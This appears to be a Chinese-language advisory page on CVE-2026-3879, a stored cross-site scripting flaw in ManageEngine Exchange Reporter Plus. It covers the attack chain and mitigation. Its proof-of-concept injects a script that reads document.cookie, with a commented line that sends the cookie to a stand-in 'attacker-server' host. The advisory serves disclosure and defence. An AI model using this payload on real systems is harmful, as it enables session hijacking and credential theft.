CVE-2026-3879 CVSS 7.3 高危

CVE-2026-3879 ManageEngine存储型XSS漏洞

披露日期: 2026-04-03

来源: 0fc0942c-577d-436f-ae8e-945763c79b02

漏洞信息

漏洞编号

CVE-2026-3879

漏洞类型

存储型跨站脚本

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine Exchange Reporter Plus

漏洞概述

Zohocorp ManageEngine Exchange Reporter Plus 5802之前的版本存在存储型XSS漏洞。攻击者利用低权限账号在“Equipment Mailbox Details”报告中注入恶意脚本，诱导管理员查看以执行代码，可能导致敏感信息泄露或数据篡改，风险较高。

技术细节

该漏洞存在于Zohocorp ManageEngine Exchange Reporter Plus的“Equipment Mailbox Details”报告功能中。由于系统未对用户输入进行充分的过滤和转义，经过低权限认证的攻击者可以向特定字段注入恶意JavaScript代码。该数据被持久化存储在服务器数据库中。当管理员或高权限用户访问并渲染该受影响的报告页面时，注入的脚本将在其浏览器环境中自动执行。攻击者可利用此漏洞窃取用户的Session ID、Cookie等敏感认证信息，甚至以受害者身份执行未授权操作，严重威胁系统的机密性和完整性。

攻击链分析

STEP 1

1. 侦察与访问

攻击者获取一个低权限账号，并登录到ManageEngine Exchange Reporter Plus系统。

STEP 2

2. 恶意注入

攻击者访问“Equipment Mailbox Details”报告功能，在未经过滤的输入字段中注入存储型XSS Payload（如JavaScript代码）。

STEP 3

3. 数据持久化

系统将包含恶意脚本的数据保存到数据库中，并在生成报告时调用。

STEP 4

4. 触发漏洞

管理员或高权限用户访问受感染的“Equipment Mailbox Details”报告页面。

STEP 5

5. 执行攻击

受害者的浏览器解析报告内容，执行注入的恶意脚本，导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for Stored XSS in Equipment Mailbox Details
Vulnerable Product: Zohocorp ManageEngine Exchange Reporter Plus < Build 5802
-->

<script>
  // Simple PoC to demonstrate execution via alert
  alert('CVE-2026-3879 XSS Executed: ' + document.cookie);
  
  // Advanced payload could include:
  // var img = new Image();
  // img.src = "http://attacker-server/?c=" + document.cookie;
</script>

<!--
Injection Point: Equipment Mailbox Details report fields.
-->

影响范围

Zohocorp ManageEngine Exchange Reporter Plus < 5802

防御指南

临时缓解措施

如果无法立即升级，应限制对“Equipment Mailbox Details”报告模块的访问权限，仅允许受信任的管理员访问。同时，建议部署Web应用防火墙（WAF）以检测和拦截常见的XSS攻击载荷，并加强对异常活动的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表